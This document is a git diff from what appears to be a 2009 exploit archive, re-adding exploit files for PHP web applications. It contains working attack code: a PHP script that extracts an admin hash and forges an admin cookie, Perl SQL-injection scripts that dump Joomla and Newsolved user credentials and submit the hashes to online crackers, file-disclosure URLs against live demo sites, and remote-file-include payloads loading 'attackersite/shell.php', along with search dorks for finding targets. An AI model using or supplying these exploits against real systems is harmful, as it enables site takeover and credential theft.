\n"; - die; - } - -echo "\n\n---Qabandi Is Here-------------------------------------------\n\n"; - -$Q_ver = QAB_GET("version", $data); -$Q_usr = QAB_GET("user", $data); -$Q_pwd = QAB_GET("pass", $data); - - -echo "[q]version:\n".$Q_ver."\n\n"; -echo "[q]Admin User:\n".$Q_usr."\n\n"; -echo "[q]Admin Hash:\n".$Q_pwd."\n\n"; - -$qookie = base64_encode(":".$Q_usr.":".$Q_pwd); - -echo "\n---Admin Cookie:\n"; -echo "\n\njavascript:document.cookie='user=".$qookie."';\n\n"; -echo "\n\n---Qabandi Was Here------------------------------------------\n\n"; -die; -?> - -# milw0rm.com [2009-06-29] +<? +print_r(' + || || | || + o_,_7 _|| . _o_7 _|| q_|_|| o_///_, + ( : / (_) / ( . + + ___________________ + _/QQQQQQQQQQQQQQQQQQQ\__ +---Script Almnzm SQL INJECTION __/QQQ/````````````````\QQQ\___ + _/QQQQQ/ \QQQQQQ\ +---"Powered by Almnzm" /QQQQ/`` ```QQQQ\ + /QQQQ/ \QQQQ\ +---admin cookie create |QQQQ/ By Qabandi \QQQQ| +---Add PhP Ext |QQQQ| |QQQQ| +---Upload php in adminCP |QQQQ| From Kuwait, PEACE... |QQQQ| + |QQQQ| |QQQQ| + |QQQQ\ iqa[a]hotmail.fr /QQQQ| + \QQQQ\ __ /QQQQ/ + \QQQQ\ /QQ\_QQQQ/ + \QQQQ\ \QQQQQQQ/ + \QQQQQ\ /QQQQQ/_ + ``\QQQQQ\_____________/QQQ/\QQQQ\_ + ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ +'); + +if ($argc<3) { +print_r(' +----------------------------------------------------------------------------- +Usage: php '.$argv[0].' 
localhost /mnzm/ +----------------------------------------------------------------------------- +'); +die; +} +$host = $argv[1]; +$p = "http://".$host.$argv[2]; + + function QAB_GET($qabandi, $from){ +$content = $from; +preg_match_all("/<".$qabandi.">([^<]+)<\/".$qabandi.">/", + $content, + $out, PREG_PATTERN_ORDER); + +return $out[1][0]; + } + + + + $packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0\r\n"; + $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; + $packet.="Pragma: no-cache\r\n"; + $packet.="Cookie: customer=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".";\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $o = @fsockopen($host, 80); + if(!$o){ + echo "\n[x] No response...\n"; + die; + } + + fputs($o, $packet); + while (!feof($o)) $data .= fread($o, 1024); + fclose($o); + + $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); + if ( !empty($_404) ){ + echo "\n[x] 404 Not Found... Make sure of path. \n"; + die; + } + +echo "\n\n---Qabandi Is Here-------------------------------------------\n\n"; + +$Q_ver = QAB_GET("version", $data); +$Q_usr = QAB_GET("user", $data); +$Q_pwd = QAB_GET("pass", $data); + + +echo "[q]version:\n".$Q_ver."\n\n"; +echo "[q]Admin User:\n".$Q_usr."\n\n"; +echo "[q]Admin Hash:\n".$Q_pwd."\n\n"; + +$qookie = base64_encode(":".$Q_usr.":".$Q_pwd); + +echo "\n---Admin Cookie:\n"; +echo "\n\njavascript:document.cookie='user=".$qookie."';\n\n"; +echo "\n\n---Qabandi Was Here------------------------------------------\n\n"; +die; +?> + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9036.txt b/platforms/php/webapps/9036.txt index da6ca4d2d..2ab274960 100755 --- a/platforms/php/webapps/9036.txt +++ b/platforms/php/webapps/9036.txt 
@@ -1,20 +1,20 @@ - =-=-local file include-=-= - --=-=-=-=-=-=-=-=-=-=-=- -script: PHP-Sugar 0.80 ------------------------ -Author: ahmadbady -my site :Coming Soon -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -download from:http://php-sugar.net/files/?mod=files - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -if (isset($_GET['t'])) - $file = $_GET['t']; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -xpl: -/path/test/index.php?t=..//..//..//..//..//boot.ini%00 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=- - -# milw0rm.com [2009-06-29] + =-=-local file include-=-= + +-=-=-=-=-=-=-=-=-=-=-=- +script: PHP-Sugar 0.80 +----------------------- +Author: ahmadbady +my site :Coming Soon +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +download from:http://php-sugar.net/files/?mod=files + +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +if (isset($_GET['t'])) + $file = $_GET['t']; +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +xpl: +/path/test/index.php?t=..//..//..//..//..//boot.ini%00 +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=- + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9037.txt b/platforms/php/webapps/9037.txt index a62dcaa0b..7a7c82874 100755 --- a/platforms/php/webapps/9037.txt +++ b/platforms/php/webapps/9037.txt 
@@ -1,21 +1,21 @@ -################################################################################################################# -[+] Clicknet CMS v2.1(side) File Disclosure Vulnerability -[+] Discovered By ThE g0bL!N -[+] Vendor:http://cms.clicknet.dk -[+} Download:http://cms.clicknet.dk/download/index.php?test=2 -[+] Dork:"Powered by Clicknet CMS" -[+] Note: All Site Danemark So Fuck It please :) -[+] Greets : R3d-D3v!L -################################################################################################################# -Exploit: -------- -Exploit ---- -http://127.0.0.1/index.php?side=../index [ out of .php ] -Then View Source To Get A good View -Demo ----- -http://www.t68.clicknet.dk/index.php?side=../index -################################################################################################################ - -# milw0rm.com [2009-06-29] +################################################################################################################# +[+] Clicknet CMS v2.1(side) File Disclosure Vulnerability +[+] Discovered By ThE g0bL!N +[+] Vendor:http://cms.clicknet.dk +[+} Download:http://cms.clicknet.dk/download/index.php?test=2 +[+] Dork:"Powered by Clicknet CMS" +[+] Note: All Site Danemark So Fuck It please :) +[+] Greets : R3d-D3v!L +################################################################################################################# +Exploit: +------- +Exploit +--- +http://127.0.0.1/index.php?side=../index [ out of .php ] +Then View Source To Get A good View +Demo +---- +http://www.t68.clicknet.dk/index.php?side=../index +################################################################################################################ + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9040.txt b/platforms/php/webapps/9040.txt index 5a15abab1..3a4a23253 100755 --- a/platforms/php/webapps/9040.txt +++ b/platforms/php/webapps/9040.txt 
@@ -1,51 +1,51 @@ -#!/usr/bin/perl -w - -#Joomla com_bookflip(book_id) Sql injection# -######################################## -#[~] Author : boom3rang -#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan -#--------------------------------------- -#[!] <name>BookFlip</name> -#[!] <creationDate>Juin 2008</creationDate> -#[!] <author>FCI F-Cimag-In</author> -#[!] <copyright>Ce composant est distribué gratuitement.</copyright> -#[!] <authorEmail>postmaster@f-cimag-in.com</authorEmail> -#[!] <authorUrl>www.f-cimag-in.com</authorUrl> -#[!] <version>2.1</version> -#--------------------------------------- -#[!] Google_Dork: inurl:"com_bookflip" -######################################## - -system("color FF0000"); -print "\t ###############################################################\n\n"; -print "\t # Kosova Hackers Group (KHG-CREW) #\n\n"; -print "\t ###############################################################\n\n"; -print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n"; -print "\t # - R.I.P redc00de #\n\n"; -print "\t # - Cod3d by boom3rang #\n\n"; -print "\t ###############################################################\n\n"; -use LWP::UserAgent; -print "\nTarget page:[http://wwww.localhost/pathdir/]: "; -chomp(my $target=<STDIN>); -#Column Name -$c_n="concat(username,0x3a,password)"; -#Table_name -$t_n="jos_users"; -$U="-9999+UNION+SELECT+"; -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); -$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+"; -$res = $b->request(HTTP::Request->new(GET=>$host)); -$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ -print "\n[+] Admin Hash : $1\n\n"; -print "# Veprimi mbaroi me sukses(Congratulations)! 
#\n\n"; -} -else{print "\n[-] Veprimi Deshtoi (Not Found)...\n"; -} - -######################## -# - Proud 2 be Albanian -# - Proud 2 be Muslim -######################## - -# milw0rm.com [2009-06-29] +#!/usr/bin/perl -w + +#Joomla com_bookflip(book_id) Sql injection# +######################################## +#[~] Author : boom3rang +#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan +#--------------------------------------- +#[!] <name>BookFlip</name> +#[!] <creationDate>Juin 2008</creationDate> +#[!] <author>FCI F-Cimag-In</author> +#[!] <copyright>Ce composant est distribué gratuitement.</copyright> +#[!] <authorEmail>postmaster@f-cimag-in.com</authorEmail> +#[!] <authorUrl>www.f-cimag-in.com</authorUrl> +#[!] <version>2.1</version> +#--------------------------------------- +#[!] Google_Dork: inurl:"com_bookflip" +######################################## + +system("color FF0000"); +print "\t ###############################################################\n\n"; +print "\t # Kosova Hackers Group (KHG-CREW) #\n\n"; +print "\t ###############################################################\n\n"; +print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n"; +print "\t # - R.I.P redc00de #\n\n"; +print "\t # - Cod3d by boom3rang #\n\n"; +print "\t ###############################################################\n\n"; +use LWP::UserAgent; +print "\nTarget page:[http://wwww.localhost/pathdir/]: "; +chomp(my $target=<STDIN>); +#Column Name +$c_n="concat(username,0x3a,password)"; +#Table_name +$t_n="jos_users"; +$U="-9999+UNION+SELECT+"; +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); +$host = $target . 
"/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+"; +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ +print "\n[+] Admin Hash : $1\n\n"; +print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n"; +} +else{print "\n[-] Veprimi Deshtoi (Not Found)...\n"; +} + +######################## +# - Proud 2 be Albanian +# - Proud 2 be Muslim +######################## + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9041.txt b/platforms/php/webapps/9041.txt index c538f7a43..47252e11d 100755 --- a/platforms/php/webapps/9041.txt +++ b/platforms/php/webapps/9041.txt 
@@ -1,26 +1,26 @@ -################################################################################################################# -[+] Audio Article Directory Remote File Disclosure Vulnerability -[+] Discovered By ThE g0bL!N -Vendor:http://audioarticledirectory.com -################################################################################################################# -Poc ---- -Download.php -<? -$file = "./".$_GET['file']; => one - header('Content-Description: File Transfer'); - header('Content-Type: application/force-download'); - header("Content-Disposition: attachment; filename=\"".basename($file)."\";"); - header('Content-Length: ' . filesize($file)); -@readfile($file) OR die(); => 2 -?> -Exploit ----- -http://victim/download.php?file=download.php -http://victim/download.php?file=./passwords.php -Demo ----- -http://audioarticledirectory.com/demo/download.php?file=./passwords.php -################################################################################################################ - -# milw0rm.com [2009-06-29] +################################################################################################################# +[+] Audio Article Directory Remote File Disclosure Vulnerability +[+] Discovered By ThE g0bL!N +Vendor:http://audioarticledirectory.com +################################################################################################################# +Poc +--- +Download.php +<? +$file = "./".$_GET['file']; => one + header('Content-Description: File Transfer'); + header('Content-Type: application/force-download'); + header("Content-Disposition: attachment; filename=\"".basename($file)."\";"); + header('Content-Length: ' . 
filesize($file)); +@readfile($file) OR die(); => 2 +?> +Exploit +---- +http://victim/download.php?file=download.php +http://victim/download.php?file=./passwords.php +Demo +---- +http://audioarticledirectory.com/demo/download.php?file=./passwords.php +################################################################################################################ + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9042.pl b/platforms/php/webapps/9042.pl index 624b483f6..7647d53ef 100755 --- a/platforms/php/webapps/9042.pl +++ b/platforms/php/webapps/9042.pl 
@@ -1,260 +1,260 @@ -#!/usr/bin/perl -w -# Neversolved.pl -# -# Copyright (c) 2009 by <jmp-esp.net> -# -# A simple login grabber -# by lama - 06/23/2009 -# -# Tested on: Newsolved 1.1.6 - -use strict; -use LWP::UserAgent; -use Getopt::Std; -use vars qw/ %opt /; -getopts( "i:p:u:lfh", \%opt ); - -my @bugs = -( - [ - "newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE" - ."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok", - "monat_num=1:(.*?):([a-f0-9]{32})" - ], - [ - "newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw" - ."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]", - "([^>]+):([a-f0-9]{32})<" - ], - [ - "newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3," - ."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]", - "<i>(.*?):([a-f0-9]{32})<\/i>" - ] -); - -my @lookups = -( - [ - 'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search', - '', - '<div id="result" >(.*?)</div>' - ], - [ - 'http://milw0rm.com/cracker/search.php', - 'hash=[HASH]&Submit=Submit', - '>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>' - ], - [ - 'http://securitystats.com/tools/hashcrack.php', - 'inputhash=[HASH]&type=MD5&Submit=Submit', - '<BR>[a-f0-9]{32} = (.*?)</td>' - ], - [ - 'http://md5decrypter.com/index.php', - 'hash=[HASH]&submit=Decrypt', - '<b class=\'red\'>Normal Text: </b>(.*?)\n' - ] -); - -sub isHost -{ - my $target = shift; - if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) - { - my $host = $1; - my $folder = ( $2 ? 
$2 : '/' ); - if ( $folder !~ /\/$/ ) - { - $folder .= '/'; - } - return "http://$host$folder"; - } - else - { - return 0; - } -} - -sub replacePlaceholder -{ - my $search = shift; - my $replace = shift; - my $placeholder = shift; - $search=~s/\[$placeholder\]/$replace/g; - return $search; -} - -sub isVulnerable -{ - my $target = shift; - my $ua = LWP::UserAgent->new; - my $request = new HTTP::Request('GET', $target); - $request->header('User-Agent' => $opt{u}); - my $response = $ua->request($request); - my $body = $response->content; - if ($body =~ /mysql_fetch_object/) - { - return 1; - } - elsif (!($body =~ /styles_output\.css/)) - { - return 0; - } - else - { - return -1; - } -} - -sub getHash -{ - my $target = shift; - my $regexp = shift; - my $ua = LWP::UserAgent->new; - my $request = new HTTP::Request('GET', $target); - $request->header('User-Agent' => $opt{u}); - my $response = $ua->request($request); - my $body = $response->content; - if ($body =~ /$regexp/) - { - return ($1, $2); - } - else - { - return 0; - } -} - -sub searchPlaintext -{ - my $hash = shift; - foreach (@lookups) - { - my $server = replacePlaceholder(@$_[0], $hash, "HASH"); - my $post = replacePlaceholder(@$_[1], $hash, "HASH"); - my $ua = LWP::UserAgent->new; - my $request = new HTTP::Request('POST', $server); - $request->content("$post"); - $request->content_type('application/x-www-form-urlencoded'); - $request->header('Referer' => $server); - $request->header('User-Agent' => $opt{u}); - my $response = $ua->request($request); - my $body = $response->content; - if ($body =~ /@$_[2]/) - { - return $1; - } - - } - return 0; -} - -sub attackTarget -{ - my $target = shift; - my $userid = shift; - foreach (@bugs) - { - my $bug = @$_[0]; - $bug = replacePlaceholder($bug, $userid, "USERID"); - $bug = replacePlaceholder($bug, $opt{p}, "PREFIX"); - (my $username, my $password) = getHash($target.$bug, @$_[1]); - if (($username) && ($password)) - { - return ($username, $password); - } - } - return 
0; -} - -sub showHelp -{ - print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )\n" - . "Usage: $0 [options] Victim\n" - . "OPTIONS\n" - . " -i integer: Userid [1]\n" - . " -u string: Useragent [IE]\n" - . " -p string: Prefix [newsolved]\n" - . " -f: Force [optional]\n" - . " -l: Lookup [optional]\n" - . " -h: Help [optional]\n" - . "EXAMPLES\n" - . " ./$0 http://pentagon.gov/news/\n" - . " ./$0 -f -i 4 http://omnomnom.com/\n" - . "OTHER\n" - . " Magic_Quotes_GPC needs to be off\n"; -} - -sub showBanner -{ - print " __ \n" - . " |__|.--------.-----.______.-----.-----.-----.\n" - . " | || | _ |______| -__|__ --| _ |\n" - . " | ||__|__|__| __| |_____|_____| __|\n" - . "|___| |__| lama 06/23/2009 |__| \n" - . "Kampfgeschrei!\n\n"; -} - -if ($opt{h}) -{ - showHelp(); - exit; -} - -my $victim = shift; -if (!($victim) || !($victim = isHost($victim))) -{ - showHelp(); - exit; -} - -$opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u}); -$opt{i} = '1' if (!$opt{i}); -$opt{p} = 'newsolved' if (!$opt{p}); - -if (scalar(@bugs) < 1) -{ - print "Bugs or gtfo. Srsly.\n"; - exit; -} - -my $vulnerability = isVulnerable($victim.$bugs[0][0]); -if ($vulnerability == 0) -{ - print "This doesn't look like Newsolved. Read the help, now.\n\n"; - showHelp(); - exit if (!$opt{f}); -} -elsif ($vulnerability == -1) -{ - print "Magic_Quotes_Gpc seems to be on. Read the help, now.\n\n"; - showHelp(); - exit if (!$opt{f}); -} - -showBanner(); -(my $username, my $password) = attackTarget($victim, $opt{i}); -if ($username) -{ - print "Target:\t\t".isHost($victim)." ( ID: ".$opt{i}." 
)\n"; - print "Username:\t$username\nPassword:\t$password\n"; - if ($opt{l}) - { - my $cleartext = searchPlaintext($password); - if ($cleartext) - { - print "Cleartext:\t$cleartext\n"; - } - else - { - print "Cleartext:\tNot found\n"; - } - } -} -else -{ - print "Unable to retrieve the password: Is the userid correct?\n"; -} - -# milw0rm.com [2009-06-29] +#!/usr/bin/perl -w +# Neversolved.pl +# +# Copyright (c) 2009 by <jmp-esp.net> +# +# A simple login grabber +# by lama - 06/23/2009 +# +# Tested on: Newsolved 1.1.6 + +use strict; +use LWP::UserAgent; +use Getopt::Std; +use vars qw/ %opt /; +getopts( "i:p:u:lfh", \%opt ); + +my @bugs = +( + [ + "newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE" + ."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok", + "monat_num=1:(.*?):([a-f0-9]{32})" + ], + [ + "newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw" + ."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]", + "([^>]+):([a-f0-9]{32})<" + ], + [ + "newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3," + ."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]", + "<i>(.*?):([a-f0-9]{32})<\/i>" + ] +); + +my @lookups = +( + [ + 'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search', + '', + '<div id="result" >(.*?)</div>' + ], + [ + 'http://milw0rm.com/cracker/search.php', + 'hash=[HASH]&Submit=Submit', + '>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>' + ], + [ + 'http://securitystats.com/tools/hashcrack.php', + 'inputhash=[HASH]&type=MD5&Submit=Submit', + '<BR>[a-f0-9]{32} = (.*?)</td>' + ], + [ + 'http://md5decrypter.com/index.php', + 'hash=[HASH]&submit=Decrypt', + '<b class=\'red\'>Normal Text: </b>(.*?)\n' + ] +); + +sub isHost +{ + my $target = shift; + if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) + { + my $host = $1; + my $folder = ( $2 ? 
$2 : '/' ); + if ( $folder !~ /\/$/ ) + { + $folder .= '/'; + } + return "http://$host$folder"; + } + else + { + return 0; + } +} + +sub replacePlaceholder +{ + my $search = shift; + my $replace = shift; + my $placeholder = shift; + $search=~s/\[$placeholder\]/$replace/g; + return $search; +} + +sub isVulnerable +{ + my $target = shift; + my $ua = LWP::UserAgent->new; + my $request = new HTTP::Request('GET', $target); + $request->header('User-Agent' => $opt{u}); + my $response = $ua->request($request); + my $body = $response->content; + if ($body =~ /mysql_fetch_object/) + { + return 1; + } + elsif (!($body =~ /styles_output\.css/)) + { + return 0; + } + else + { + return -1; + } +} + +sub getHash +{ + my $target = shift; + my $regexp = shift; + my $ua = LWP::UserAgent->new; + my $request = new HTTP::Request('GET', $target); + $request->header('User-Agent' => $opt{u}); + my $response = $ua->request($request); + my $body = $response->content; + if ($body =~ /$regexp/) + { + return ($1, $2); + } + else + { + return 0; + } +} + +sub searchPlaintext +{ + my $hash = shift; + foreach (@lookups) + { + my $server = replacePlaceholder(@$_[0], $hash, "HASH"); + my $post = replacePlaceholder(@$_[1], $hash, "HASH"); + my $ua = LWP::UserAgent->new; + my $request = new HTTP::Request('POST', $server); + $request->content("$post"); + $request->content_type('application/x-www-form-urlencoded'); + $request->header('Referer' => $server); + $request->header('User-Agent' => $opt{u}); + my $response = $ua->request($request); + my $body = $response->content; + if ($body =~ /@$_[2]/) + { + return $1; + } + + } + return 0; +} + +sub attackTarget +{ + my $target = shift; + my $userid = shift; + foreach (@bugs) + { + my $bug = @$_[0]; + $bug = replacePlaceholder($bug, $userid, "USERID"); + $bug = replacePlaceholder($bug, $opt{p}, "PREFIX"); + (my $username, my $password) = getHash($target.$bug, @$_[1]); + if (($username) && ($password)) + { + return ($username, $password); + } + } + return 
0; +} + +sub showHelp +{ + print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )\n" + . "Usage: $0 [options] Victim\n" + . "OPTIONS\n" + . " -i integer: Userid [1]\n" + . " -u string: Useragent [IE]\n" + . " -p string: Prefix [newsolved]\n" + . " -f: Force [optional]\n" + . " -l: Lookup [optional]\n" + . " -h: Help [optional]\n" + . "EXAMPLES\n" + . " ./$0 http://pentagon.gov/news/\n" + . " ./$0 -f -i 4 http://omnomnom.com/\n" + . "OTHER\n" + . " Magic_Quotes_GPC needs to be off\n"; +} + +sub showBanner +{ + print " __ \n" + . " |__|.--------.-----.______.-----.-----.-----.\n" + . " | || | _ |______| -__|__ --| _ |\n" + . " | ||__|__|__| __| |_____|_____| __|\n" + . "|___| |__| lama 06/23/2009 |__| \n" + . "Kampfgeschrei!\n\n"; +} + +if ($opt{h}) +{ + showHelp(); + exit; +} + +my $victim = shift; +if (!($victim) || !($victim = isHost($victim))) +{ + showHelp(); + exit; +} + +$opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u}); +$opt{i} = '1' if (!$opt{i}); +$opt{p} = 'newsolved' if (!$opt{p}); + +if (scalar(@bugs) < 1) +{ + print "Bugs or gtfo. Srsly.\n"; + exit; +} + +my $vulnerability = isVulnerable($victim.$bugs[0][0]); +if ($vulnerability == 0) +{ + print "This doesn't look like Newsolved. Read the help, now.\n\n"; + showHelp(); + exit if (!$opt{f}); +} +elsif ($vulnerability == -1) +{ + print "Magic_Quotes_Gpc seems to be on. Read the help, now.\n\n"; + showHelp(); + exit if (!$opt{f}); +} + +showBanner(); +(my $username, my $password) = attackTarget($victim, $opt{i}); +if ($username) +{ + print "Target:\t\t".isHost($victim)." ( ID: ".$opt{i}." )\n"; + print "Username:\t$username\nPassword:\t$password\n"; + if ($opt{l}) + { + my $cleartext = searchPlaintext($password); + if ($cleartext) + { + print "Cleartext:\t$cleartext\n"; + } + else + { + print "Cleartext:\tNot found\n"; + } + } +} +else +{ + print "Unable to retrieve the password: Is the userid correct?\n"; +} + +# milw0rm.com [2009-06-29] 
diff --git a/platforms/php/webapps/9043.txt b/platforms/php/webapps/9043.txt index 2566bc936..b20743673 100755 --- a/platforms/php/webapps/9043.txt +++ b/platforms/php/webapps/9043.txt 
@@ -1,25 +1,25 @@ -############################################################################################# -[+] DM Albumsâ„¢ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability -[+] Author : Septemb0x -[+] www.Cyber-Warrior.Org - Information Technology's World -[+] Greetz : BARCOD3 And All Friends... -[+] Dork : Yok Dork Mork :D -[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/ -############################################################################################# -[+] NORMAL EXPLOIT; -[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php -[+] WORDPRESS EXPLOIT -[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php -############################################################################################# -< ---- Note ---- > -H....R; -Sen çok üstün zekaya sahip birisin, -emin olbilirsin, :D -Sql injection ile domain hackleyebilen tek lamersin, :D -ASP'de Rfi Bulmakta Birebirsin, -Ama Gördüğüm En hıyar Lamersin :D -Bu Kafiyelerde Bi Tarafına Girsin ;) -Lol H....R :D -< ---- Note Finished ---- > - -# milw0rm.com [2009-06-29] +############################################################################################# +[+] DM Albumsâ„¢ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability +[+] Author : Septemb0x +[+] www.Cyber-Warrior.Org - Information Technology's World +[+] Greetz : BARCOD3 And All Friends... 
+[+] Dork : Yok Dork Mork :D +[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/ +############################################################################################# +[+] NORMAL EXPLOIT; +[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php +[+] WORDPRESS EXPLOIT +[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php +############################################################################################# +< ---- Note ---- > +H....R; +Sen çok üstün zekaya sahip birisin, +emin olbilirsin, :D +Sql injection ile domain hackleyebilen tek lamersin, :D +ASP'de Rfi Bulmakta Birebirsin, +Ama Gördüğüm En hıyar Lamersin :D +Bu Kafiyelerde Bi Tarafına Girsin ;) +Lol H....R :D +< ---- Note Finished ---- > + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9044.txt b/platforms/php/webapps/9044.txt index 270e5f98b..6efcf1f2d 100755 --- a/platforms/php/webapps/9044.txt +++ b/platforms/php/webapps/9044.txt 
@@ -1,24 +1,24 @@ -############################################################################################# -[+] DM FileManager 3.9.4 Remote File Include Vulnerability -[+] Author : Septemb0x -[+] www.Cyber-Warrior.Org - Information Technology's World -[+] Greetz : BARCOD3 And All Friends... -[+] Dork : Yok Dork Mork :D -[+] Download Script : http://uploaded.to/file/3z84ie -[+] Product Site : http://www.dutchmonkey.com -############################################################################################# -[+] EXPLOIT; -[+] http://[sitename]/[path]/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php -############################################################################################# -< ---- Note ---- > -H....R; -Sen çok üstün zekaya sahip birisin, -emin olbilirsin, :D -Sql injection ile domain hackleyebilen tek lamersin, :D -ASP'de Rfi Bulmakta Birebirsin, -Ama Gördüğüm En hıyar Lamersin :D -Bu Kafiyelerde Bi Tarafına Girsin ;) -Lol H....R :D -< ---- Note Finished ---- > - -# milw0rm.com [2009-06-29] +############################################################################################# +[+] DM FileManager 3.9.4 Remote File Include Vulnerability +[+] Author : Septemb0x +[+] www.Cyber-Warrior.Org - Information Technology's World +[+] Greetz : BARCOD3 And All Friends... 
+[+] Dork : Yok Dork Mork :D +[+] Download Script : http://uploaded.to/file/3z84ie +[+] Product Site : http://www.dutchmonkey.com +############################################################################################# +[+] EXPLOIT; +[+] http://[sitename]/[path]/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php +############################################################################################# +< ---- Note ---- > +H....R; +Sen çok üstün zekaya sahip birisin, +emin olbilirsin, :D +Sql injection ile domain hackleyebilen tek lamersin, :D +ASP'de Rfi Bulmakta Birebirsin, +Ama Gördüğüm En hıyar Lamersin :D +Bu Kafiyelerde Bi Tarafına Girsin ;) +Lol H....R :D +< ---- Note Finished ---- > + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9048.txt b/platforms/php/webapps/9048.txt index 76a5a6fa0..ce613dbce 100755 --- a/platforms/php/webapps/9048.txt +++ b/platforms/php/webapps/9048.txt 
@@ -1,11 +1,11 @@ -############################################################################################# -[+] WordPress Plugin DM Albums 1.9.2 Remote File Dislosure Vulnerability -[+] Author : Stack -[+] Greetz : V4 Team & Sec R1z -[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/ -############################################################################################# -[+] Xpl : -[+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/ -############################################################################################# - -# milw0rm.com [2009-06-30] +############################################################################################# +[+] WordPress Plugin DM Albums 1.9.2 Remote File Dislosure Vulnerability +[+] Author : Stack +[+] Greetz : V4 Team & Sec R1z +[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/ 